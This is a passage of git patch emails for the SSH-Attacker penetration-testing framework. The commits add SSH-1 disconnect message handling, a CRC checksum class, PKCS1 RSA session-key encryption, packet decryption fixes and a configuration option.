CryptoConstants.X25519_POINT_SIZE; + this.encapsulationSize = CryptoConstants.SNTRUP761_CIPHERTEXT_SIZE; + break; + case CURVE25519_FRODOKEM1344: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = CryptoConstants.X25519_POINT_SIZE; + this.encapsulationSize = CryptoConstants.FRODOKEM1344_CIPHERTEXT_SIZE; + break; + case SNTRUP4591761_X25519: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = CryptoConstants.X25519_POINT_SIZE; + this.encapsulationSize = CryptoConstants.SNTRUP4591761_CIPHERTEXT_SIZE; + break; + case NISTP521_FIRESABER: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = CryptoConstants.NISTP521_POINT_SIZE; + this.encapsulationSize = CryptoConstants.FIRESABER_CIPHERTEXT_SIZE; + break; + case NISTP521_KYBER1024: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = CryptoConstants.NISTP521_POINT_SIZE; + this.encapsulationSize = CryptoConstants.KYBER1024_CIPHERTEXT_SIZE; + break; + }*/ + + /* this.agreementSize = agreementSize; + this.encapsulationSize = encapsulationSize; + this.combiner = combiner;*/ + } + + private void parseCRC(DisconnectMessage message) { + byte[] CRC = parseByteArrayField(4); + LOGGER.debug("CRC: {}", ArrayConverter.bytesToHexString(CRC)); + } + + private void parseDisconnectReason(DisconnectMessage message) { + int lenght = parseIntField(4); + String disconnectReason = parseByteString(lenght); + message.setDisconnectReason(disconnectReason); + } + + /* private void parseHybridKey(ServerPublicKeyMessage message) { + int length = parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH); + LOGGER.debug("Total Length: " + length); + + switch (combiner) { + case CLASSICAL_CONCATENATE_POSTQUANTUM: + message.setPublicKeyLength(agreementSize); + message.setPublicKey(parseByteArrayField(agreementSize)); + message.setCiphertextLength(encapsulationSize); + message.setCombinedKeyShare(parseByteArrayField(encapsulationSize)); + break; + case POSTQUANTUM_CONCATENATE_CLASSICAL: + message.setCiphertextLength(encapsulationSize); + message.setCombinedKeyShare(parseByteArrayField(encapsulationSize)); + message.setPublicKeyLength(agreementSize); + message.setPublicKey(parseByteArrayField(agreementSize)); + break; + default: + LOGGER.warn("combiner not supported. Can not update message"); + break; + } + }*/ + + /* private void parseSignature(ServerPublicKeyMessage message) { + message.setSignatureLength(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); + LOGGER.debug("Signature length: " + message.getSignatureLength().getValue()); + message.setSignature(parseByteArrayField(message.getSignatureLength().getValue())); + LOGGER.debug("Signature: " + message.getSignature()); + }*/ + + private void parseProtocolFlags(DisconnectMessage message) {} + + @Override + protected void parseMessageSpecificContents(DisconnectMessage message) { + parseDisconnectReason(message); + parseCRC(message); + + // parseHybridKey(message); + // parseSignature(message); + } + + /* + @Override + protected HybridKeyExchangeReplyMessage createMessage() { + return new HybridKeyExchangeReplyMessage(); + } + */ + + @Override + public void parse(DisconnectMessage message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/DisconnectMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/DisconnectMessagePreparator.java new file mode 100644 index 000000000..5dd6fa50d --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/DisconnectMessagePreparator.java @@ -0,0 +1,37 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.*; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; +import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.DisconnectMessage; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class DisconnectMessagePreparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + private HybridKeyExchangeCombiner combiner; + + private SshPublicKey serverKey; + + public DisconnectMessagePreparator( + Chooser chooser, DisconnectMessage message, HybridKeyExchangeCombiner combiner) { + super(chooser, message, MessageIdConstantSSH1.SSH_MSG_DISCONNECT); + this.combiner = combiner; + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/DisconnectMessageSerializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/DisconnectMessageSerializier.java new file mode 100644 index 000000000..161c69de9 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/DisconnectMessageSerializier.java @@ -0,0 +1,29 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.HybridKeyExchangeCombiner; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.DisconnectMessage; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class DisconnectMessageSerializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + private HybridKeyExchangeCombiner combiner; + + public DisconnectMessageSerializier( + DisconnectMessage message, HybridKeyExchangeCombiner combiner) { + super(message); + this.combiner = combiner; + } + + @Override + public void serializeMessageSpecificContents() {} +} From f78e04d065c352cca0fa4fe37d597abb908ecd0a Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 3 Sep 2023 14:12:34 +0200 Subject: [PATCH 071/176] Adding CRC Checksum Calculator --- .../sshattacker/core/crypto/checksum/CRC.java | 88 +++++++++++++++++++ 1 file changed, 88 insertions(+) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/checksum/CRC.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/checksum/CRC.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/checksum/CRC.java new file mode 100644 index 000000000..2b775cf14 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/checksum/CRC.java @@ -0,0 +1,88 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.crypto.checksum; + +public class CRC { + + private long reverseBits(long n, int numBits) { + long result = 0; + for (int i = 0; i < numBits; i++) { + result = (result << 1) | ((n >> i) & 1); + } + return result; + } + + private long mask; + + private int width; + private long polynomial; + private boolean reflectIn; + private boolean reflectOut; + private long init; + private long finalXor; + + public long calculateCRC(byte[] data) { + long curValue = this.init; + long topBit = 1L << (this.width - 1); + long mask = (topBit << 1) - 1; + int end = data.length; + + for (int i = 0; i < end; i++) { + long curByte = ((long) (data[i])) & 0x00FFL; + if (this.reflectIn) { + curByte = reverseBits(curByte, 8); + } + + for (int j = 0x80; j != 0; j >>= 1) { + long bit = curValue & topBit; + curValue <<= 1; + + if ((curByte & j) != 0) { + bit ^= topBit; + } + + if (bit != 0) { + curValue ^= this.polynomial; + } + } + } + + if (this.reflectOut) { + curValue = reverseBits(curValue, this.width); + } + + curValue = curValue ^ this.finalXor; + + return curValue & mask; + } + + public CRC( + int width, + long polynomial, + long init, + boolean reflectIn, + boolean reflectOut, + long finalXor) { + + this.width = width; + this.polynomial = polynomial; + this.init = init; + this.reflectIn = reflectIn; + this.reflectOut = reflectOut; + this.finalXor = finalXor; + + if (this.reflectIn) { + this.init = reverseBits(this.init, width); + } + if (this.width >= 64) { + this.mask = 0; + } else { + this.mask = (1L << this.width) - 1; + } + } +} From b91a029e5a7cd48e03f6fb4ab08239b7915ba437 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 3 Sep 2023 14:16:47 +0200 Subject: [PATCH 072/176] fixing crc-checksum and implementing correct encryption to work with openssh client / server --- .../ClientSessionKeyMessageHandler.java | 57 ++++++++++--------- .../ClientSessionKeyMessagePreparator.java | 43 ++++++++------ .../ClientSessionKeyMessageSerializer.java | 8 +-- .../ServerPublicKeyMessageSerializer.java | 7 +-- 4 files changed, 62 insertions(+), 53 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java index 1e8c2815e..361458287 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java @@ -8,13 +8,10 @@ package de.rub.nds.sshattacker.core.protocol.ssh1.handler; import de.rub.nds.modifiablevariable.util.ArrayConverter; -import de.rub.nds.sshattacker.core.constants.KeyExchangeAlgorithm; import de.rub.nds.sshattacker.core.crypto.cipher.AbstractCipher; -import de.rub.nds.sshattacker.core.crypto.cipher.CipherFactory; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; -import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; @@ -48,7 +45,6 @@ public void adjustContext(ClientSessionKeyMessage message) { byte[] decryptedSessionkey = decryptSessionKey(message); sshContext.setSessionKey(decryptedSessionkey); - } private byte[] decryptSessionKey(ClientSessionKeyMessage message) { @@ -141,7 +137,7 @@ private byte[] decryptSessionKey(ClientSessionKeyMessage message) { hostPublickey.getModulus().bitLength(), serverPublicKey.getModulus().bitLength()); - outerEncryption = + /* outerEncryption = CipherFactory.getOaepCipher( KeyExchangeAlgorithm.RSA1024_PCKS1, hostPrivateKey); sessionKey = outerEncryption.decrypt(sessionKey); @@ -149,49 +145,54 @@ private byte[] decryptSessionKey(ClientSessionKeyMessage message) { innerEncryption = CipherFactory.getOaepCipher( KeyExchangeAlgorithm.RSA1024_PCKS1, serverPrivatKey); - sessionKey = innerEncryption.decrypt(sessionKey); + sessionKey = innerEncryption.decrypt(sessionKey);*/ /* Alternative Imlementation */ - /* Cipher encryptCipher = Cipher.getInstance("RSA/ECB/PKCS1Padding"); + Cipher encryptCipher = Cipher.getInstance("RSA/ECB/PKCS1Padding"); encryptCipher.init(Cipher.DECRYPT_MODE, hostPrivateKey); sessionKey = encryptCipher.doFinal(sessionKey); encryptCipher.init(Cipher.DECRYPT_MODE, serverPrivatKey); - sessionKey = encryptCipher.doFinal(sessionKey);*/ + sessionKey = encryptCipher.doFinal(sessionKey); /* Alternative Imlementation */ } else { - outerEncryption = - CipherFactory.getOaepCipher( - KeyExchangeAlgorithm.RSA1024_PCKS1, serverPrivatKey); - sessionKey = outerEncryption.decrypt(sessionKey); - - innerEncryption = - CipherFactory.getOaepCipher( - KeyExchangeAlgorithm.RSA1024_PCKS1, hostPrivateKey); - sessionKey = innerEncryption.decrypt(sessionKey); + /* + outerEncryption = + CipherFactory.getOaepCipher( + KeyExchangeAlgorithm.RSA1024_PCKS1, serverPrivatKey); + sessionKey = outerEncryption.decrypt(sessionKey); + + innerEncryption = + CipherFactory.getOaepCipher( + KeyExchangeAlgorithm.RSA1024_PCKS1, hostPrivateKey); + sessionKey = innerEncryption.decrypt(sessionKey); + */ /* Alternative Imlementation */ - /* innerEncryption = - CipherFactory.getOaepCipher( - KeyExchangeAlgorithm.RSA1024_PCKS1, serverPrivatKey); - sessionKey = innerEncryption.encrypt(sessionKey); + Cipher encryptCipher = Cipher.getInstance("RSA/ECB/PKCS1Padding"); + encryptCipher.init(Cipher.DECRYPT_MODE, serverPrivatKey); + sessionKey = encryptCipher.doFinal(sessionKey); - outerEncryption = - CipherFactory.getOaepCipher( - KeyExchangeAlgorithm.RSA1024_PCKS1, hostPrivateKey); - sessionKey = outerEncryption.encrypt(sessionKey);*/ + encryptCipher.init(Cipher.DECRYPT_MODE, hostPrivateKey); + sessionKey = encryptCipher.doFinal(sessionKey); /* Alternative Imlementation */ } - } catch (CryptoException e) { - LOGGER.fatal(e); - e.printStackTrace(); + } catch (NoSuchPaddingException e) { + throw new RuntimeException(e); + } catch (IllegalBlockSizeException e) { + throw new RuntimeException(e); + } catch (NoSuchAlgorithmException e) { + throw new RuntimeException(e); + } catch (BadPaddingException e) { + throw new RuntimeException(e); + } catch (InvalidKeyException e) { throw new RuntimeException(e); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java index 710aa1508..447bc30ea 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java @@ -11,18 +11,21 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.crypto.cipher.AbstractCipher; -import de.rub.nds.sshattacker.core.crypto.cipher.CipherFactory; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; -import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import java.security.InvalidKeyException; import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; import java.util.List; import java.util.Random; +import javax.crypto.BadPaddingException; +import javax.crypto.Cipher; +import javax.crypto.IllegalBlockSizeException; +import javax.crypto.NoSuchPaddingException; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -41,7 +44,9 @@ public ClientSessionKeyMessagePreparator( } private void prepareAntiSpoofingCookie() { - getObject().setAntiSpoofingCookie(chooser.getConfig().getAntiSpoofingCookie()); + getObject() + .setAntiSpoofingCookie( + chooser.getContext().getSshContext().getAntiSpoofingCookie()); } private void prepareSessionID() { @@ -184,7 +189,7 @@ private void prepareSessionKey() { hostPublickey.getModulus().bitLength(), serverPublicKey.getModulus().bitLength()); - innerEncryption = + /* innerEncryption = CipherFactory.getOaepCipher( KeyExchangeAlgorithm.RSA1024_PCKS1, hostPublickey); sessionKey = innerEncryption.encrypt(sessionKey); @@ -193,17 +198,16 @@ private void prepareSessionKey() { CipherFactory.getOaepCipher( KeyExchangeAlgorithm.RSA1024_PCKS1, serverPublicKey); - sessionKey = outerEncryption.encrypt(sessionKey); + sessionKey = outerEncryption.encrypt(sessionKey);*/ /* Alternative Imlementation */ - /* Cipher encryptCipher = Cipher.getInstance("RSA/ECB/PKCS1Padding"); + Cipher encryptCipher = Cipher.getInstance("RSA/ECB/PKCS1Padding"); encryptCipher.init(Cipher.ENCRYPT_MODE, hostPublickey); - sessionKey = encryptCipher.doFinal(sessionKey);*/ + sessionKey = encryptCipher.doFinal(sessionKey); - /* encryptCipher.init(Cipher.ENCRYPT_MODE, serverPublicKey); - sessionKey = encryptCipher.doFinal(sessionKey);*/ + sessionKey = encryptCipher.doFinal(sessionKey); /* Alternative Imlementation */ @@ -215,7 +219,7 @@ private void prepareSessionKey() { hostPublickey.getModulus().bitLength(), serverPublicKey.getModulus().bitLength()); - innerEncryption = + /* innerEncryption = CipherFactory.getOaepCipher( KeyExchangeAlgorithm.RSA1024_PCKS1, serverPublicKey); sessionKey = innerEncryption.encrypt(sessionKey); @@ -224,28 +228,33 @@ private void prepareSessionKey() { CipherFactory.getOaepCipher( KeyExchangeAlgorithm.RSA1024_PCKS1, hostPublickey); - sessionKey = outerEncryption.encrypt(sessionKey); + sessionKey = outerEncryption.encrypt(sessionKey);*/ /* Alternative Imlementation */ // shorter - /* Cipher encryptCipher = Cipher.getInstance("RSA/ECB/PKCS1Padding"); + Cipher encryptCipher = Cipher.getInstance("RSA/ECB/PKCS1Padding"); encryptCipher.init(Cipher.ENCRYPT_MODE, serverPublicKey); - sessionKey = encryptCipher.doFinal(sessionKey);*/ - + sessionKey = encryptCipher.doFinal(sessionKey); // longer - /* encryptCipher.init(Cipher.ENCRYPT_MODE, hostPublickey); sessionKey = encryptCipher.doFinal(sessionKey); - */ /* Alternative Imlementation */ LOGGER.debug("Scucessfull Decrypted, Sanity-Check passed"); } - } catch (CryptoException e) { + } catch (NoSuchPaddingException e) { + throw new RuntimeException(e); + } catch (IllegalBlockSizeException e) { + throw new RuntimeException(e); + } catch (NoSuchAlgorithmException e) { + throw new RuntimeException(e); + } catch (BadPaddingException e) { + throw new RuntimeException(e); + } catch (InvalidKeyException e) { throw new RuntimeException(e); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ClientSessionKeyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ClientSessionKeyMessageSerializer.java index 47fd2c939..d6ceb7153 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ClientSessionKeyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ClientSessionKeyMessageSerializer.java @@ -9,10 +9,10 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.HybridKeyExchangeCombiner; +import de.rub.nds.sshattacker.core.crypto.checksum.CRC; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; import java.math.BigInteger; -import java.util.zip.CRC32; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -58,10 +58,10 @@ private void serializeProtocolFlags() { } private void serializCRCChecksum() { - CRC32 crc = new CRC32(); - crc.update(getAlreadySerialized()); - byte[] checksum = ArrayConverter.longToBytes(crc.getValue(), 4); + CRC crc32 = new CRC(32, 0x0104C11DB7L, 0, true, true, 0); + byte[] checksum = ArrayConverter.longToBytes(crc32.calculateCRC(getAlreadySerialized()), 4); appendBytes(checksum); + LOGGER.debug("CRC: " + ArrayConverter.bytesToRawHexString(checksum)); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java index d24559505..9d25feb30 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java @@ -9,9 +9,9 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.HybridKeyExchangeCombiner; +import de.rub.nds.sshattacker.core.crypto.checksum.CRC; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; -import java.util.zip.CRC32; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -56,9 +56,8 @@ private void serializeSupportedAuthMask() { } private void serializCRCChecksum() { - CRC32 crc = new CRC32(); - crc.update(getAlreadySerialized()); - byte[] checksum = ArrayConverter.longToBytes(crc.getValue(), 4); + CRC crc32 = new CRC(32, 0x0104C11DB7L, 0, true, true, 0); + byte[] checksum = ArrayConverter.longToBytes(crc32.calculateCRC(getAlreadySerialized()), 4); appendBytes(checksum); LOGGER.debug("CRC: " + ArrayConverter.bytesToRawHexString(checksum)); } From 92ed5ae6f6323d8574a9308f82e428dd9792b471 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 3 Sep 2023 15:19:36 +0200 Subject: [PATCH 073/176] corrected first block of encrypted payload --- .../core/packet/cipher/PacketCipher.java | 4 ++-- .../core/packet/cipher/PacketMacedCipher.java | 21 ++++++------------ .../packet/parser/BinaryPacketParser.java | 22 ++++++++----------- 3 files changed, 18 insertions(+), 29 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java index 69caaffad..4fdd6220a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java @@ -162,9 +162,9 @@ public DecryptionParser(byte[] array) { } public DecryptionParser(byte[] array, int offset) { - super(new ByteArrayInputStream(Arrays.copyOfRange(array, offset, array.length - 1))); + super(new ByteArrayInputStream(Arrays.copyOfRange(array, offset, array.length))); - byte[] new_array = Arrays.copyOfRange(array, offset, array.length - 1); + byte[] new_array = Arrays.copyOfRange(array, offset, array.length); LOGGER.debug( "[bro] New Bytarray with lenght {} : {}", new_array.length, diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java index 33108333c..156d66a9a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java @@ -208,16 +208,11 @@ public void decrypt(BinaryPacket packet) throws CryptoException { decryptInner(packet); - /* DecryptionParser parser = - new DecryptionParser( - computations.getPlainPacketBytes().getValue(), - isEncryptThenMac() ? 0 : BinaryPacketConstants.PACKET_FIELD_LENGTH);*/ - DecryptionParser parser = - new DecryptionParser(computations.getPlainPacketBytes().getValue()); + new DecryptionParser( + computations.getPlainPacketBytes().getValue(), + isEncryptThenMac() ? 0 : BinaryPacketConstants.PACKET_FIELD_LENGTH); - int lenghtToForget = parser.parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH); - LOGGER.debug("[bro] lenght to forget:" + lenghtToForget); packet.setPaddingLength(parser.parseByteField(BinaryPacketConstants.PADDING_FIELD_LENGTH)); LOGGER.debug("[bro] Padding Lenght:" + packet.getPaddingLength().getValue().intValue()); packet.setCompressedPayload( @@ -302,12 +297,10 @@ private void decryptInner(AbstractPacket packet) throws CryptoException { remainingBlocksIv); } else { // Case 1b: Binary packet / First block decrypted / Cipher without IV - /* remainingBlocks = - cipher.decrypt( - Arrays.copyOfRange( - ciphertext, firstBlock.length, ciphertext.length));*/ - - remainingBlocks = cipher.decrypt(ciphertext); + remainingBlocks = + cipher.decrypt( + Arrays.copyOfRange( + ciphertext, firstBlock.length, ciphertext.length)); } plainData = ArrayConverter.concatenate(firstBlock, remainingBlocks); } else { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java index 252e54912..e13559469 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java @@ -7,6 +7,7 @@ */ package de.rub.nds.sshattacker.core.packet.parser; +import com.google.common.primitives.Bytes; import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.exceptions.CryptoException; @@ -160,12 +161,11 @@ private void parseEAMPacket(BinaryPacket binaryPacket) throws CryptoException { * byte[m] mac ; m = length of mac output */ - LOGGER.debug("I can mark: {}", getStream().markSupported()); - // int pointer = getPointer(); int blockSize = activeDecryptCipher.getEncryptionAlgorithm().getBlockSize(); int decryptedByteCount = 0; // Loop required for stream cipher support (effective block length is 1 in this case) byte[] firstBlock = new byte[0]; + byte[] firstBlockEncrypted = new byte[0]; do { byte[] block = parseByteArrayField(blockSize); byte[] decryptedBlock; @@ -178,27 +178,23 @@ private void parseEAMPacket(BinaryPacket binaryPacket) throws CryptoException { decryptedBlock = activeDecryptCipher.getCipher().decrypt(block); } firstBlock = ArrayConverter.concatenate(firstBlock, decryptedBlock); + firstBlockEncrypted = ArrayConverter.concatenate(firstBlockEncrypted, block); decryptedByteCount += blockSize; - LOGGER.debug( - "LENGHT_FIELD_LENGHT = {} - DECRYPTED = {} - DECRYPTED_LENGHT = {}", - BinaryPacketConstants.LENGTH_FIELD_LENGTH, - firstBlock, - firstBlock.length); } while (decryptedByteCount < BinaryPacketConstants.LENGTH_FIELD_LENGTH); - // setPointer(pointer); - LOGGER.debug("DONE WITH PARSING LENGHT"); + computations.setPlainPacketBytes(firstBlock, true); binaryPacket.setLength( ArrayConverter.bytesToInt( Arrays.copyOfRange( firstBlock, 0, BinaryPacketConstants.LENGTH_FIELD_LENGTH))); + binaryPacket.setCiphertext( - parseByteArrayField( - /*BinaryPacketConstants.LENGTH_FIELD_LENGTH - +*/ binaryPacket.getLength().getValue())); + Bytes.concat( + firstBlockEncrypted, + parseByteArrayField(binaryPacket.getLength().getValue()))); + binaryPacket.setMac( parseByteArrayField(activeDecryptCipher.getMacAlgorithm().getOutputSize())); - LOGGER.debug("DONE WITH PARSING parseEAMPacket "); } } From 361c432571f4dffeef28de4b22041305d4726ce7 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 3 Sep 2023 15:33:38 +0200 Subject: [PATCH 074/176] removing unused comments and old code --- .../nds/sshattacker/core/config/Config.java | 12 ++++++ .../sshattacker/core/layer/LayerStack.java | 2 - .../core/layer/LayerStackFactory.java | 2 - .../sshattacker/core/layer/ProtocolLayer.java | 8 ++-- .../core/layer/context/SshContext.java | 2 - .../core/layer/impl/PacketLayer.java | 20 ++++------ .../core/layer/impl/SSH2Layer.java | 40 ++----------------- .../sshattacker/core/layer/impl/TcpLayer.java | 6 +-- .../layer/stream/HintedLayerInputStream.java | 4 +- .../sshattacker/core/packet/BinaryPacket.java | 2 +- .../sshattacker/core/packet/BlobPacket.java | 2 +- .../core/workflow/WorkflowExecutor.java | 2 +- .../action/ForwardMessagesAction.java | 28 +------------ .../core/workflow/action/MessageAction.java | 36 ----------------- .../core/workflow/action/SendAction.java | 19 +-------- 15 files changed, 35 insertions(+), 150 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java index 5988864e7..f9517e512 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java @@ -79,6 +79,9 @@ public void setDefaultAdditionalPadding(Integer defaultAdditionalPadding) { /** The default running mode, when running the SSH-Attacker */ private RunningModeType defaultRunningMode = RunningModeType.CLIENT; + private Boolean resetClientSourcePort = true; + + // region VersionExchange /** Client protocol and software version string starting with the SSH version (SSH-2.0-...) */ private String clientVersion; @@ -92,6 +95,7 @@ public void setDefaultAdditionalPadding(Integer defaultAdditionalPadding) { private String serverComment; /** End-of-message sequence of the servers' VersionExchangeMessage */ private String serverEndOfMessageSequence; + // endregion // region Pre-KeyExchange @@ -1344,6 +1348,10 @@ public void setEnforceSettings(Boolean enforceSettings) { public void setHostKeys(final List> hostKeys) { this.hostKeys = Objects.requireNonNull(hostKeys); } + + public void setResetClientSourcePort(Boolean resetClientSourcePort) { + this.resetClientSourcePort = resetClientSourcePort; + } // endregion // region Getters for Authentification @@ -1577,6 +1585,10 @@ public Boolean getResetWorkflowtracesBeforeSaving() { return resetWorkflowtracesBeforeSaving; } + public Boolean isResetClientSourcePort() { + return resetClientSourcePort; + } + // endregion // region Setters for Workflow settings diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java index 336fb0073..068eb1d93 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java +++ 